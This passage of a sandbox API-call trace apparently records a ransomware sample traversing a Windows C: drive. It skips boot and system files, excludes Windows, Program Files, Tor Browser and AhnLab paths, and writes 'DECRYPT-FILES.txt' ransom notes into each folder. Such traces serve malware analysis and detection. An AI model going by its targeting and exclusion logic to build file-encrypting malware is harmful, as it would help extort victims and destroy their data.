lpString1="C:\\Boot\\zh-TW\\") returned="C:\\Boot\\zh-TW\\" [0071.364] lstrcatW (in: lpString1="C:\\Boot\\zh-TW\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\zh-TW\\bootmgr.exe.mui") returned="C:\\Boot\\zh-TW\\bootmgr.exe.mui" [0071.364] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.364] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\bootmgr.exe.mui" (normalized: "c:\\boot\\zh-tw\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.364] CloseHandle (hObject=0x0) returned 0 [0071.364] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.364] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c1bfc0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c1bfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c1bfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.364] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.364] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c1bfc0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c1bfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c1bfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.364] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.364] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.364] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.365] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.365] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.365] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.365] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.365] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.365] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.365] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.365] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.365] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.365] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.365] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0071.365] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.365] lstrlenW (lpString="C:\\Boot\\zh-TW\\") returned 14 [0071.365] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.365] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\zh-TW\\" | out: lpString1="C:\\Boot\\zh-TW\\") returned="C:\\Boot\\zh-TW\\" [0071.365] lstrcatW (in: lpString1="C:\\Boot\\zh-TW\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Boot\\zh-TW\\jkbimi8.tmp") returned="C:\\Boot\\zh-TW\\jkbimi8.tmp" [0071.365] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.365] CreateFileW (lpFileName="C:\\Boot\\zh-TW\\jkbimi8.tmp" (normalized: "c:\\boot\\zh-tw\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.365] CloseHandle (hObject=0x0) returned 0 [0071.365] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.366] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c1bfc0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c1bfc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c1bfc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0071.366] FindClose (in: hFindFile=0x5f8c18 | out: hFindFile=0x5f8c18) returned 1 [0071.366] CloseHandle (hObject=0x420) returned 1 [0071.366] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="zh-TW\\", cAlternateFileName="")) returned 0 [0071.366] FindClose (in: hFindFile=0x5f8bd8 | out: hFindFile=0x5f8bd8) returned 1 [0071.366] CloseHandle (hObject=0x418) returned 1 [0071.366] FindNextFileW (in: hFindFile=0x5f8ad8, lpFindFileData=0x3f2f8c4 | out: lpFindFileData=0x3f2f8c4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0x77166e57, dwReserved1=0x625898, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0071.366] lstrcmpiW (lpString1="bootmgr", lpString2="DECRYPT-FILES.txt") returned -1 [0071.366] lstrcmpiW (lpString1="bootmgr", lpString2="autorun.inf") returned 1 [0071.366] lstrcmpiW (lpString1="bootmgr", lpString2="boot.ini") returned 1 [0071.366] lstrcmpiW (lpString1="bootmgr", lpString2="desktop.ini") returned -1 [0071.366] lstrcmpiW (lpString1="bootmgr", lpString2="ntuser.dat") returned -1 [0071.366] lstrcmpiW (lpString1="bootmgr", lpString2="iconcache.db") returned -1 [0071.366] lstrcmpiW (lpString1="bootmgr", lpString2="bootsect.bak") returned -1 [0071.366] lstrcmpiW (lpString1="bootmgr", lpString2="ntuser.dat.log") returned -1 [0071.366] lstrcmpiW (lpString1="bootmgr", lpString2="thumbs.db") returned -1 [0071.366] lstrcmpiW (lpString1="bootmgr", lpString2="Bootfont.bin") returned 1 [0071.366] lstrlenW (lpString="C:\\") returned 3 [0071.366] lstrlenW (lpString="bootmgr") returned 7 [0071.366] lstrcpyW (in: lpString1=0x3f2f094, lpString2="C:\\" | out: lpString1="C:\\") returned="C:\\" [0071.366] lstrcatW (in: lpString1="C:\\", lpString2="bootmgr" | out: lpString1="C:\\bootmgr") returned="C:\\bootmgr" [0071.366] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.367] CreateFileW (lpFileName="C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.367] CloseHandle (hObject=0x0) returned 0 [0071.367] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.367] FindNextFileW (in: hFindFile=0x5f8ad8, lpFindFileData=0x3f2f8c4 | out: lpFindFileData=0x3f2f8c4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x77166e57, dwReserved1=0x625898, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0071.367] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="DECRYPT-FILES.txt") returned -1 [0071.367] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="autorun.inf") returned 1 [0071.367] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="boot.ini") returned 1 [0071.367] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="desktop.ini") returned -1 [0071.367] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="ntuser.dat") returned -1 [0071.367] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="iconcache.db") returned -1 [0071.367] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="bootsect.bak") returned 0 [0071.367] FindNextFileW (in: hFindFile=0x5f8ad8, lpFindFileData=0x3f2f8c4 | out: lpFindFileData=0x3f2f8c4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77166e57, dwReserved1=0x625898, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0071.367] lstrcmpW (lpString1="Config.Msi", lpString2=".") returned 1 [0071.367] lstrcmpW (lpString1="Config.Msi", lpString2="..") returned 1 [0071.367] lstrcatW (in: lpString1="Config.Msi", lpString2="\\" | out: lpString1="Config.Msi\\") returned="Config.Msi\\" [0071.368] lstrcatW (in: lpString1="C:\\", lpString2="Config.Msi\\" | out: lpString1="C:\\Config.Msi\\") returned="C:\\Config.Msi\\" [0071.368] StrStrW (lpFirst="C:\\Config.Msi\\", lpSrch="\\Program Files") returned 0x0 [0071.368] StrStrW (lpFirst="C:\\Config.Msi\\", lpSrch=":\\Windows") returned 0x0 [0071.368] StrStrW (lpFirst="C:\\Config.Msi\\", lpSrch="\\Games\\") returned 0x0 [0071.368] StrStrW (lpFirst="C:\\Config.Msi\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.368] StrStrW (lpFirst="C:\\Config.Msi\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.368] StrStrW (lpFirst="C:\\Config.Msi\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.368] StrStrW (lpFirst="C:\\Config.Msi\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.368] StrStrW (lpFirst="C:\\Config.Msi\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.368] StrStrW (lpFirst="C:\\Config.Msi\\", lpSrch="\\All Users") returned 0x0 [0071.368] StrStrW (lpFirst="C:\\Config.Msi\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.368] StrStrW (lpFirst="C:\\Config.Msi\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.368] StrStrW (lpFirst="C:\\Config.Msi\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.368] StrStrW (lpFirst="C:\\Config.Msi\\", lpSrch="AhnLab") returned 0x0 [0071.368] StrStrW (lpFirst="C:\\Config.Msi\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.368] lstrlenW (lpString="C:\\Config.Msi\\") returned 14 [0071.368] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.368] wsprintfW (in: param_1=0x3f2ee28, param_2="%s\\%s" | out: param_1="C:\\Config.Msi\\\\jkbimi8.tmp") returned 26 [0071.368] CreateFileW (lpFileName="C:\\Config.Msi\\\\jkbimi8.tmp" (normalized: "c:\\config.msi\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x418 [0071.368] lstrlenW (lpString="C:\\Config.Msi\\") returned 14 [0071.369] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.369] wsprintfW (in: param_1=0x3f2ee28, param_2="%s\\%s" | out: param_1="C:\\Config.Msi\\\\DECRYPT-FILES.txt") returned 32 [0071.369] CreateFileW (lpFileName="C:\\Config.Msi\\\\DECRYPT-FILES.txt" (normalized: "c:\\config.msi\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0071.369] WriteFile (in: hFile=0x41c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2ee24, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2ee24*=0x23fc, lpOverlapped=0x0) returned 1 [0071.370] CloseHandle (hObject=0x41c) returned 1 [0071.370] lstrlenW (lpString="C:\\Config.Msi\\") returned 14 [0071.370] lstrcatW (in: lpString1="C:\\Config.Msi\\", lpString2="*" | out: lpString1="C:\\Config.Msi\\*") returned="C:\\Config.Msi\\*" [0071.370] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xa6c42120, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c42120, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8bd8 [0071.370] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.370] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xa6c42120, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c42120, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.370] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.370] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.370] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c42120, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c42120, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c42120, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.370] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.370] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c42120, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c42120, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c42120, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.370] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.370] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.371] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.371] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.371] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.371] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.371] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.371] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.371] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.371] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.371] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.371] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.371] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.371] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0071.371] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.371] lstrlenW (lpString="C:\\Config.Msi\\") returned 14 [0071.371] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.371] lstrcpyW (in: lpString1=0x3f2ee18, lpString2="C:\\Config.Msi\\" | out: lpString1="C:\\Config.Msi\\") returned="C:\\Config.Msi\\" [0071.371] lstrcatW (in: lpString1="C:\\Config.Msi\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Config.Msi\\jkbimi8.tmp") returned="C:\\Config.Msi\\jkbimi8.tmp" [0071.371] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.371] CreateFileW (lpFileName="C:\\Config.Msi\\jkbimi8.tmp" (normalized: "c:\\config.msi\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.371] CloseHandle (hObject=0x0) returned 0 [0071.371] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.372] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c42120, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c42120, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c42120, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0071.372] FindClose (in: hFindFile=0x5f8bd8 | out: hFindFile=0x5f8bd8) returned 1 [0071.372] CloseHandle (hObject=0x418) returned 1 [0071.372] FindNextFileW (in: hFindFile=0x5f8ad8, lpFindFileData=0x3f2f8c4 | out: lpFindFileData=0x3f2f8c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa696e700, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa696e700, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa696e700, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x77166e57, dwReserved1=0x625898, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.372] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.372] FindNextFileW (in: hFindFile=0x5f8ad8, lpFindFileData=0x3f2f8c4 | out: lpFindFileData=0x3f2f8c4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x625898, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0071.372] lstrcmpW (lpString1="Documents and Settings", lpString2=".") returned 1 [0071.372] lstrcmpW (lpString1="Documents and Settings", lpString2="..") returned 1 [0071.372] lstrcatW (in: lpString1="Documents and Settings", lpString2="\\" | out: lpString1="Documents and Settings\\") returned="Documents and Settings\\" [0071.372] lstrcatW (in: lpString1="C:\\", lpString2="Documents and Settings\\" | out: lpString1="C:\\Documents and Settings\\") returned="C:\\Documents and Settings\\" [0071.372] StrStrW (lpFirst="C:\\Documents and Settings\\", lpSrch="\\Program Files") returned 0x0 [0071.372] StrStrW (lpFirst="C:\\Documents and Settings\\", lpSrch=":\\Windows") returned 0x0 [0071.372] StrStrW (lpFirst="C:\\Documents and Settings\\", lpSrch="\\Games\\") returned 0x0 [0071.372] StrStrW (lpFirst="C:\\Documents and Settings\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.372] StrStrW (lpFirst="C:\\Documents and Settings\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.372] StrStrW (lpFirst="C:\\Documents and Settings\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.372] StrStrW (lpFirst="C:\\Documents and Settings\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.372] StrStrW (lpFirst="C:\\Documents and Settings\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.372] StrStrW (lpFirst="C:\\Documents and Settings\\", lpSrch="\\All Users") returned 0x0 [0071.372] StrStrW (lpFirst="C:\\Documents and Settings\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.372] StrStrW (lpFirst="C:\\Documents and Settings\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.372] StrStrW (lpFirst="C:\\Documents and Settings\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.372] StrStrW (lpFirst="C:\\Documents and Settings\\", lpSrch="AhnLab") returned 0x0 [0071.372] StrStrW (lpFirst="C:\\Documents and Settings\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.373] lstrlenW (lpString="C:\\Documents and Settings\\") returned 26 [0071.373] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.373] wsprintfW (in: param_1=0x3f2ee28, param_2="%s\\%s" | out: param_1="C:\\Documents and Settings\\\\jkbimi8.tmp") returned 38 [0071.373] CreateFileW (lpFileName="C:\\Documents and Settings\\\\jkbimi8.tmp" (normalized: "c:\\documents and settings\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x418 [0071.373] lstrlenW (lpString="C:\\Documents and Settings\\") returned 26 [0071.373] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.373] wsprintfW (in: param_1=0x3f2ee28, param_2="%s\\%s" | out: param_1="C:\\Documents and Settings\\\\DECRYPT-FILES.txt") returned 44 [0071.373] CreateFileW (lpFileName="C:\\Documents and Settings\\\\DECRYPT-FILES.txt" (normalized: "c:\\documents and settings\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0071.374] WriteFile (in: hFile=0x41c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2ee24, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2ee24*=0x23fc, lpOverlapped=0x0) returned 1 [0071.375] CloseHandle (hObject=0x41c) returned 1 [0071.375] lstrlenW (lpString="C:\\Documents and Settings\\") returned 26 [0071.375] lstrcatW (in: lpString1="C:\\Documents and Settings\\", lpString2="*" | out: lpString1="C:\\Documents and Settings\\*") returned="C:\\Documents and Settings\\*" [0071.375] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\*", lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6c42120, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c42120, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c42120, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="苟盅ꀐ썮ϲ")) returned 0xffffffff [0071.375] CloseHandle (hObject=0x418) returned 1 [0071.375] FindNextFileW (in: hFindFile=0x5f8ad8, lpFindFileData=0x3f2f8c4 | out: lpFindFileData=0x3f2f8c4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0x813b7be0, ftLastWriteTime.dwHighDateTime=0x1d4d5ae, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x625898, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0071.375] lstrcmpiW (lpString1="hiberfil.sys", lpString2="DECRYPT-FILES.txt") returned 1 [0071.375] lstrcmpiW (lpString1="hiberfil.sys", lpString2="autorun.inf") returned 1 [0071.375] lstrcmpiW (lpString1="hiberfil.sys", lpString2="boot.ini") returned 1 [0071.375] lstrcmpiW (lpString1="hiberfil.sys", lpString2="desktop.ini") returned 1 [0071.375] lstrcmpiW (lpString1="hiberfil.sys", lpString2="ntuser.dat") returned -1 [0071.375] lstrcmpiW (lpString1="hiberfil.sys", lpString2="iconcache.db") returned -1 [0071.375] lstrcmpiW (lpString1="hiberfil.sys", lpString2="bootsect.bak") returned 1 [0071.375] lstrcmpiW (lpString1="hiberfil.sys", lpString2="ntuser.dat.log") returned -1 [0071.375] lstrcmpiW (lpString1="hiberfil.sys", lpString2="thumbs.db") returned -1 [0071.376] lstrcmpiW (lpString1="hiberfil.sys", lpString2="Bootfont.bin") returned 1 [0071.376] lstrlenW (lpString="hiberfil.sys") returned 12 [0071.376] lstrcmpiW (lpString1="sys", lpString2="lnk") returned 1 [0071.376] lstrcmpiW (lpString1="sys", lpString2="exe") returned 1 [0071.376] lstrcmpiW (lpString1="sys", lpString2="sys") returned 0 [0071.376] FindNextFileW (in: hFindFile=0x5f8ad8, lpFindFileData=0x3f2f8c4 | out: lpFindFileData=0x3f2f8c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa696e700, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa696e700, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa696e700, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x625898, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.376] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.376] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.376] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.376] 